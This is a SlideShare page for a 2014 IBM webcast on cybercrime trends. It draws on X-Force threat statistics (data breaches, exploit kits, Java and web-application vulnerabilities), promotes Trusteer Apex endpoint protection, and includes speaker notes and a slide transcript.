• Like
Follow the Money, Follow the Crime
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

Follow the Money, Follow the Crime

  • 423 views
Published

Cyber crime is growing in both frequency and sophistication. We all know it is out there but do we know what to look for? Do we know how to combat it? Arm yourself with the latest updates from the …

Cyber crime is growing in both frequency and sophistication. We all know it is out there but do we know what to look for? Do we know how to combat it? Arm yourself with the latest updates from the X-Force Report of current security risks & trends happening today and our solutions from Trusteer, an IBM company to help you stay one step ahead of cybercriminals.

View the full on-demand webcast: https://www.youtube.com/watch?v=axEV2aa2k4k

Published in Technology
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Be the first to comment
No Downloads

Views

Total Views
423
On SlideShare
0
From Embeds
0
Number of Embeds
3

Actions

Shares
Downloads
28
Comments
0
Likes
3

Embeds 0

No embeds

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
    No notes for slide
  • Advanced Security and Threat Research, which includes the X-Force team, is the foundation for many of the pillars in the security product portfolio.As the team tasked with staying on top of the latest threats and vulnerabilities, the information it provides is a critical aspect of providing protection to the other parts of the framework.
  • With more than 6,000 researchers, developers and subject matter experts engaged in security initiatives, IBM operates one of the world’s broadest enterprise security research, development and delivery organizations. This powerful combination of expertise is made up of the award-winning X-Force research and development team—with one of the largest vulnerability databases in the industry—and includes nine security operations centers, nine IBM Research centers, 14 software security development labs and the IBM Institute for Advanced Security with chapters in the United States, Europe and the Asia Pacific region.________________________Security Operations Centers: Atlanta, Georgia; Boulder, Colorado; Brussels, Belgium; Tokyo, Japan; Brisbane, Australia; Hortolandia, Brazil; Bangalore, India; Wroclaw, PolandNO: Detroit, Michigan; Toronto, Canada; ADD: Riyadh, Saudi Arabia; Heredia, Costa RicaSecurity Research Centers: Yorktown Heights, NY; Atlanta, GA; Almaden, CA; Ottawa, Canada; Zurich, CH; Kassel, DE; Herzliya, IL; Haifa, IL; New Delhi, IN; Tokyo, JPSecurity Development Labs: Littleton, MA; Raleigh, NC; Atlanta, GA; Austin, TX; Costa Mesa, CA; Fredericton, Canada; Toronto, CAN; Ottawa, CAN; Belfast, NIR; Delft, NL; Pune, IN; Bangalore, IN, Taipei, TW; Singapore, SG; Gold Coast, AUNote: IBM patent search performed by Paul Landsberg, IBM IP Office
  • IBM X-Force has a long standing history as one of the best known commercial security research and development groups in the worldCan leverage security expertise across IBM to better understand what is happening in securityHave numerous intelligence sources: database of more than 76k security vulnerability – monitored every dayGlobal web crawlerInternational spam collectorsWork closely with IBM managed security services group who monitor over 15B security events every day from nearly 4,000 security clients in over 133 countriesAll of this is done to stay ahead of continuing threats for our customersOur global web crawler is probably the worlds third largest behind Google and Bing. It crawls the web, and we have analyzed and classified over 17B web pages. XForce is particularly interested in files, images, or pages that contain malicious links or content. The team in Kassel Germany who builds our web crawler also developed an anti spam productWe have spam traps around the world, receive large amounts of spam so that we can analyze and understand the different types so that we can preemptively block that spamOur work covers 4 key areas:ResearchEnginesContent DeliverIndustry/Customer deliverables – such as this X-Force report, blogs, articles, presentations and speaking engagements
  • Attackers are optimizing their operations around many key initiatives which include a path of least resistance to reach the largest number of potential targets for the minimal amount of exploit effort.For example, attackers are optimizing various points of weak entry: The exploitation of trust via social media.Coordinated operations leaking user data as well as exploiting weak entry points into global brands such as foreign local language or franchise sites.Mobile malware with Android devices as the market expands.Take over of central strategic targets to access and exploit a broader base of end users.Diversion and distraction techniques which throw security administrators off path, while breaching targets under the cover.Cross-platform 0days were an optimization story as well
  • 2012 was a record year for reported data breaches and security incidents, with a 40 percent increase in total volume over 2011.1 In the first half of 2013, security incidents have already surpassed the total number reported in 2011 and are on track to surpass 2012.This year kicked off with a number of high profile sophisticated attacks on major websites, media, and tech companies
  • Figure 3 illustrates the possible financial impact of a data breach in terms of fines, loss of intellectual property, loss of customer trust, and loss of capital, etc. that an organization of any size might face.Additionally, of the sampling of security incidents reported by X-Force in 2013, in terms of the country where the attack target was located, more than three quarters of those continue to occur in the United States. This could be based on the fact that many websites are operated from the United States, or possibly that it is more common that U.S. companies and websites are disclosing publicly.
  • Attackers use spear-phishing messages to draw users to websites that contain hidden malicious Java applets (exploit sites). Once the user accesses the exploit site, the hidden Java applet exploits vulnerabilities to cause a chain of events that end with the delivery of the malware to the user’s machine, without the user’s awareness. Fifty percent (50%) of the exploits observed by X-Force malware research (Trusteer) in December 2013 targeted Java vulnerabilities indicating Java as a high risk application and top target, exposing organizations to attacks.
  • MH note:maybe hint we still didn't reach 10K vulnerabilities in a year, even though we modified the CVE number scheme to handle it, just thinking of interesting things to talk about.The declines in vulnerabilities demonstrated at the end of 2013 in both XSS and SQL injection, shown in Figure 11, couldindicate that developers are doing a better job at writing secure web applications, or possibly that traditional targets like content management systems (CMSs) and plug-ins are maturing as older vulnerabilities have been patched. As noted previously, XSS and SQL injection exploitation continue to be observed in high numbers, indicating there are still legacy systems or other unpatched web applications that remain vulnerable. This is expected, considering there are many thousands of blogs and other websites run by individuals who may not have the skills or awareness to update to later versions of their platform or framework.
  • The most prevalent consequence of vulnerability exploitation was "Gain Access" at 26% of all vulnerabilities reported in 2013. Cross-Site Scripting was the second most prevalent consequence at 18% and typically involves attacks against Web applications.
  • However, vulnerabilities in key reporting areas such as Web application, Cross-Site Scripting, and SQL injection all demonstrated downward trends in 2013. Overall web application vulnerabilities accounted for 33 percent of those publically reported, down from 43 percent in 2012. The declines in vulnerabilities demonstrated at the end of 2013 in both XSS and SQL injection could indicate that developers are doing a better job at writing secure web applications or possibly that traditional targets like CMS systems and plugins are maturing as older vulnerabilities have been patched. As noted, XSS and SQL injection exploitation continue to be observed in high numbers, indicating there are still legacy systems or other unpatched web applications which remain vulnerable. This is expected considering there are many thousands of blogs and other websites operated by individuals who may not have the skills or awareness to update to later versions of their platform or framework.
  • X-Force catalogs two categories of exploit: exploit and true exploit. Simple snippets with proof-of-concept code arecounted as exploits, while fully functional programs capable of standalone attacks are categorized separately as true exploits.Publicly available and disclosed true exploits have continued to decrease over the past five years to the lowest levels we’ve seen since 2006. At the end of 2012 we reported that total true exploits were still down overall and at the end of 2013, we seethis trend continue.
  • MH already talked about this – Unpatched vulnerabilities are a bit problem. Did you know that 60% of exploits target 1-2yo vulnerabilities
  • Java is a widely deployed high risk application that exposes organizations to advanced attacks. The number of Java vulnerabilities has continued to rise over the years, and 2013 was no exception. The number of reported Java vulnerabilities jumped significantly between 2012 and 2013, more than tripling.
  • Java applicative exploits are more difficult to defend against because they allow the applet to gain unrestricted privileges— which makes malicious activities seem legitimate at the OS level. This means that, unlike native exploits, Java applicative exploits completely bypass native OS-level protections. Plus, Java applicative exploits don’t generate buffer overflow, and hence are not prevented by methods such as DEP, ASLR, SEHOP and others.A native exploit results in running native shell code. This type of exploit is accomplished by techniques that include buffer overflow, use-after-free and more.

Transcript

  • 1. © 2012 IBM Corporation IBM Security Systems 1© 2013 IBM Corporation Follow the Money, Follow the Crime 19th March 2014
  • 2. © 2014 IBM Corporation IBM Security Systems Agenda  IBM X-Force Threat Intelligence Quarterly 1Q 2014 – Michael Hamelin, Lead X-Force Security Architect CTO Office, IBM Security Systems  Protecting Enterprise Endpoints against Advanced Malware with Trusteer Apex – Dana Tamir, Director of Enterprise Security Trusteer, an IBM Company  Connect with IBM Security  Questions?
  • 3. © 2012 IBM Corporation IBM Security Systems 3© 2013 IBM Corporation IBM X-Force Threat Intelligence Quarterly 1Q 2014 Michael Hamelin Lead X-Force Security Architect CTO Office, IBM Security Systems
  • 4. © 2014 IBM Corporation IBM Security Systems X-Force is the foundation for advanced security and threat research across the IBM Security Framework
  • 5. © 2014 IBM Corporation IBM Security Systems At IBM, the world is our security lab v13-016,000+ IBM researchers, developers, and subject matter experts focused on security 3,000+ IBM security patents Security Operations Centers Security Research and Development Labs Institute for Advanced Security Branches
  • 6. © 2014 IBM Corporation IBM Security Systems 6 Collaborative IBM teams monitor and analyze the changing threat landscape Coverage 20,000+ devices under contract 3,700+ managed clients worldwide 15B+ events managed per day 133 monitored countries (MSS) 1,000+ security related patents Depth 17B analyzed web pages & images 40M spam & phishing attacks 76K documented vulnerabilities Billions of intrusion attempts daily Millions of unique malware samples
  • 7. © 2014 IBM Corporation IBM Security Systems 7 Attackers optimize and refine target selection
  • 8. © 2014 IBM Corporation IBM Security Systems 8 more than half a billion records of personally identifiable information (PII) were leaked in 2013
  • 9. © 2014 IBM Corporation IBM Security Systems 9
  • 10. © 2014 IBM Corporation IBM Security Systems 10 What is the impact of a data breach and Where are customer’s most affected?
  • 11. © 2014 IBM Corporation IBM Security Systems 11 Weaponized content focused on end user apps
  • 12. © 2014 IBM Corporation IBM Security Systems 12 Attackers use exploit kits to deliver payloads Blackhole Exploit Kit Most popular in 2013 Creator arrested in October Styx Exploit Kit Rising in popularity Successful in exploiting IE and Firefox on Windows
  • 13. © 2014 IBM Corporation IBM Security Systems 13 Effectively targeting end users MalvertisingWatering Hole  Attacker injects malware on special interest website  Vulnerable niche users exploited  Attacker injects malware on ad network  Malicious ad embedded on legitimate websites  Vulnerable users exploited
  • 14. © 2014 IBM Corporation IBM Security Systems 14 Production Applications  Developed in house  Acquired  Off-the-shelf commercial apps  In-house development  Outsourced development Applications in Development Web app vulnerabilities: the dominant threat
  • 15. © 2014 IBM Corporation IBM Security Systems 15 Vulnerabilities designed to gain additional or unauthorized access Exploitation Gain access XSS typically attacks web apps
  • 16. © 2014 IBM Corporation IBM Security Systems 16 Declines in key reporting – Web App Vulns Could indicate… Better job at writing secure web applications CMS systems & plugins maturing as older vulns are patched Attacks continue… XSS, SQLi exploitation still observed in high numbers
  • 17. © 2014 IBM Corporation IBM Security Systems 17 Declines in key reporting – True Exploits Two Categories tracked Proof-of-concept code Fully functional programs capable of attacks are true exploits Continue to decrease Lowest levels we’ve seen in past 5 years
  • 18. © 2012 IBM Corporation IBM Security Systems 18© 2014 IBM Corporation Protecting Enterprise Endpoints against Advanced Malware with Trusteer Apex Dana Tamir Director of Enterprise Security Trusteer, an IBM Company
  • 19. © 2014 IBM Corporation IBM Security Systems 19 About Trusteer
  • 20. © 2014 IBM Corporation IBM Security Systems 20 APTs and Targeted Attacks The Tool of Choice: Exploits and Advanced Malware  The Entry Point: –Vulnerable User Endpoints  The Means: –Exploits, Drive-by Download –Advanced Malware –Compromised Credentials
  • 21. © 2014 IBM Corporation IBM Security Systems 21 Vulnerability disclosures leveled out in 2013, but attackers have plenty of older, unpatched systems to exploit. 60% of the exploits target vulnerabilities that have been publicly known for over 12 months!!!
  • 22. © 2014 IBM Corporation IBM Security Systems 22 Do you patch applications? 22 Source: Ponemon
  • 23. © 2014 IBM Corporation IBM Security Systems 23 The Threat Lifecycle Exploit Chain Data Exfiltration Data Exfiltration Prevention Exploit Chain Disruption
  • 24. © 2014 IBM Corporation IBM Security Systems 24 Controlling Strategic Chokepoints To break the threat lifecycle #ofTypes Attack Progression Weaponized Content: Endless (IPS, Sandbox) Unpatched and zero-day vulnerabilities: Many (Patching) Ways to deliver and infect: Hundreds Malicious Files: Endless (AV, Whitelisting) Ways to establish communication channels: Hundreds Destinations : Endless (C&C traffic detection) Strategic Chokepoint Strategic Chokepoint Malicious Behavior: Many (HIPs) Data exfiltrationExploit Chain
  • 25. © 2014 IBM Corporation IBM Security Systems 25 Trusteer Apex: 3 Security Layers
  • 26. © 2014 IBM Corporation IBM Security Systems 26 A few words about Java A powerful yet dangerous application: Did you know that… Java is installed on ~85% of the desktop computers. Google Analytics
  • 27. © 2014 IBM Corporation IBM Security Systems 27 … combined with a presence in every enterprise makes Java the top targetfor exploits. explosive growth of Java vulnerabilities…
  • 28. © 2014 IBM Corporation IBM Security Systems 28 Most successful Java exploits are applicative, exploiting vulnerabilities related to the Java security manager and bypassing native OS-level protections. Applicative exploits  Difficult to defend  Gain unrestricted privileges  Bypass native OS-level protections Native exploits  Buffer Overflow  Illegal memory use  Use-after-free
  • 29. © 2014 IBM Corporation IBM Security Systems 29 Java Execution Should be Monitored and Controlled  Prevent Exploitation of both Native and Applicative Vulnerabilities  Execution of Java code on the endpoint must be restricted –Fine grained control is needed  Oracle’s solution: Allow execution of signed JARs –Not good enough
  • 30. © 2014 IBM Corporation IBM Security Systems 30 Connect with IBM Security @ibmxforceand@ibmsecurityFollow us at force-www.SecurityIntelligence.com/xForce Security Insights blog at-X Download IBM X-Force Threat Intelligence Reports http://www.ibm.com/security/xforce/ Trusteer Apex https://www.trusteer.com/products/trusteer-apex
  • 31. © 2014 IBM Corporation IBM Security Systems 31 www.ibm.com/security © Copyright IBM Corporation 2013. All rights reserved. The information contained in these materials is provided for informational purposes only, and is provided AS IS without warranty of any kind, express or implied. IBM shall not be responsible for any damages arising out of the use of, or otherwise related to, these materials. Nothing contained in these materials is intended to, nor shall have the effect of, creating any warranties or representations from IBM or its suppliers or licensors, or altering the terms and conditions of the applicable license agreement governing the use of IBM software. References in these materials to IBM products, programs, or services do not imply that they will be available in all countries in which IBM operates. Product release dates and/or capabilities referenced in these materials may change at any time at IBM’s sole discretion based on market opportunities or other factors, and are not intended to be a commitment to future product or feature availability in any way. IBM, the IBM logo, and other IBM products and services are trademarks of the International Business Machines Corporation, in the United States, other countries or both. Other company, product, or service names may be trademarks or service marks of others. Statement of Good Security Practices: IT system security involves protecting systems and information through prevention, detection and response to improper access from within and outside your enterprise. Improper access can result in information being altered, destroyed or misappropriated or can result in damage to or misuse of your systems, including to attack others. No IT system or product should be considered completely secure and no single product or security measure can be completely effective in preventing improper access. IBM systems and products are designed to be part of a comprehensive security approach, which will necessarily involve additional operational procedures, and may require other systems, products or services to be most effective. IBM DOES NOT WARRANT THAT SYSTEMS AND PRODUCTS ARE IMMUNE FROM THE MALICIOUS OR ILLEGAL CONDUCT OF ANY PARTY. www.ibm.com/security © Copyright IBM Corporation 2014. All rights reserved. The information contained in these materials is provided for informational purposes only, and is provided AS IS without warranty of any kind, express or implied. IBM shall not be responsible for any damages arising out of the use of, or otherwise related to, these materials. Nothing contained in these materials is intended to, nor shall have the effect of, creating any warranties or representations from IBM or its suppliers or licensors, or altering the terms and conditions of the applicable license agreement governing the use of IBM software. References in these materials to IBM products, programs, or services do not imply that they will be available in all countries in which IBM operates. Product release dates and/or capabilities referenced in these materials may change at any time at IBM’s sole discretion based on market opportunities or other factors, and are not intended to be a commitment to future product or feature availability in any way. IBM, the IBM logo, and other IBM products and services are trademarks of the International Business Machines Corporation, in the United States, other countries or both. Other company, product, or service names may be trademarks or service marks of others. Statement of Good Security Practices: IT system security involves protecting systems and information through prevention, detection and response to improper access from within and outside your enterprise. Improper access can result in information being altered, destroyed or misappropriated or can result in damage to or misuse of your systems, including to attack others. No IT system or product should be considered completely secure and no single product or security measure can be completely effective in preventing improper access. IBM systems and products are designed to be part of a comprehensive security approach, which will necessarily involve additional operational procedures, and may require other systems, products or services to be most effective. IBM DOES NOT WARRANT THAT SYSTEMS AND PRODUCTS ARE IMMUNE FROM THE MALICIOUS OR ILLEGAL CONDUCT OF ANY PARTY.